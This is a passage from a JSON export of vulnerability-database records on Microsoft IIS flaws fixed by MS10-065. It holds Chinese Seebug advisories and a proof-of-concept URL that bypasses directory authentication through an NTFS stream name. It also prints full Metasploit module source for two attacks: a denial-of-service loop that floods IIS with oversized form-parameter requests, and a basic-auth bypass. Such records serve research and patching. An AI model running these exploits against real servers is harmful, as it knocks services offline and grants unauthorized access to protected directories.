IIS\u91cd\u590d\u53c2\u6570\u8bf7\u6c42\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff08MS10-065\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1899"], "modified": "2010-09-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20121", "id": "SSV:20121", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:08:20", "description": "BUGTRAQ ID: 41314\r\nCVE ID: CVE-2010-2731\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u6ca1\u6709\u6b63\u786e\u5730\u5904\u7406\u76ee\u5f55\u7684\u57fa\u7840\u8ba4\u8bc1\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u8bf7\u6c42\u7684\u76ee\u5f55\u540d\u540e\u9644\u52a0NTFS\u6d41\u540d\u79f0\u548c\u6d41\u7c7b\u578b\uff08:$i30:$INDEX_ALLOCATION\uff09\u7ed5\u8fc7\u8ba4\u8bc1\u8bbf\u95ee\u53d7\u4fdd\u62a4\u7684\u76ee\u5f55\u3002\r\n\n\nMicrosoft IIS 5.1\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-065\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-065\uff1aVulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-065.mspx?pf=true", "cvss3": {}, "published": "2010-09-17T00:00:00", "type": "seebug", "title": "Microsoft IIS\u4ea4\u6362\u6570\u636e\u6d41\u7ed5\u8fc7\u8ba4\u8bc1\u6f0f\u6d1e(MS10-065)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-2731"], "modified": "2010-09-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20120", "id": "SSV:20120", "sourceData": "\n http://victim.com/SecretFolder:$I30:$Index_Allocation/\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20120", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:08:17", "description": "BUGTRAQ ID: 43138\r\nCVE ID: CVE-2010-2730\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\n\u5bf9\u4e8e\u542f\u7528\u4e86FastCGI\u529f\u80fd\u7684IIS\u670d\u52a1\u5668\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u7279\u5236\u7684HTTP\u8bf7\u6c42\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nMicrosoft IIS 7.5\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528FastCGI\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-065\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-065\uff1aVulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-065.mspx?pf=true", "cvss3": {}, "published": "2010-09-17T00:00:00", "type": "seebug", "title": "Microsoft IIS FastCGI\u8bf7\u6c42\u5934\u8fdc\u7a0b\u6ea2\u51fa\u6f0f\u6d1e\uff08MS10-065\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2010-09-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20122", "id": "SSV:20122", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-08-22T00:07:29", "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a Post Form value.\n", "edition": 2, "cvss3": {}, "published": "2010-11-24T20:10:01", "type": "metasploit", "title": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',\n 'Description' => %q{\n The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.\n },\n 'Author' =>\n [\n 'Heyder Andrade <heyder[at]alligatorteam.org>',\n 'Leandro Oliveira <leadro[at]alligatorteam.org>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1899' ],\n [ 'OSVDB', '67978'],\n [ 'MSB', 'MS10-065'],\n [ 'EDB', '15167' ]\n ],\n 'DisclosureDate' => 'Sep 14 2010'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),\n OptString.new('URI', [ true, 'URI to request', '/page.asp' ])\n ])\n end\n\n\n def run\n uri = datastore['URI']\n print_status(\"Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}\")\n\n begin\n while(1)\n begin\n connect\n payload = \"C=A&\" * 40000\n length = payload.size\n sploit = \"HEAD #{uri} HTTP/1.1\\r\\n\"\n sploit << \"Host: #{datastore['VHOST'] || rhost}\\r\\n\"\n sploit << \"Connection:Close\\r\\n\"\n sploit << \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n sploit << \"Content-Length:#{length} \\r\\n\\r\\n\"\n sploit << payload\n sock.put(sploit)\n #print_status(\"DoS packet sent.\")\n disconnect\n rescue Errno::ECONNRESET\n next\n end\n end\n rescue Errno::EPIPE\n print_good(\"IIS should now be unavailable\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-08-12T22:04:44", "description": "This module bypasses basic authentication for Internet Information Services (IIS). By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.\n", "edition": 2, "cvss3": {}, "published": "2012-06-25T20:48:36", "type": "metasploit", "title": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2731"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',\n 'Description' => %q{\n This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.\n },\n 'References' =>\n [\n [ 'CVE', '2010-2731' ],\n [ 'OSVDB', '66160' ],\n [ 'MSB', 'MS10-065' ],\n [ 'URL', 'http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]\n ],\n 'Author' =>\n [\n 'Soroush Dalili',\n 'sinn3r'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Jul 02 2010\"\n ))\n\n register_options(\n [\n OptString.new(\"TARGETURI\", [true, 'The URI directory where basic auth is enabled', '/'])\n ])\n end\n\n\n def has_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n vprint_status(res.body) if res\n\n return (res and res.code == 401)\n end\n\n def try_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n uri << Rex::Text.rand_text_alpha(rand(10)+5) + \".#{Rex::Text.rand_text_alpha(3)}\"\n\n dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'\n\n user = Rex::Text.rand_text_alpha(rand(10) + 5)\n pass = Rex::Text.rand_text_alpha(rand(10) + 5)\n\n\n vprint_status(\"Requesting: #{dir}\")\n res = send_request_cgi({\n 'uri' => dir,\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n vprint_status(res.body) if res\n\n return (res and res.code != 401 and res.code != 404) ? dir : ''\n end\n\n def run\n if not has_auth\n print_error(\"No basic authentication enabled\")\n return\n end\n\n bypass_string = try_auth\n\n if bypass_string.empty?\n print_error(\"The bypass attempt did not work\")\n else\n print_good(\"You can bypass auth by doing: #{bypass_string}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/iis_auth_bypass.rb", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}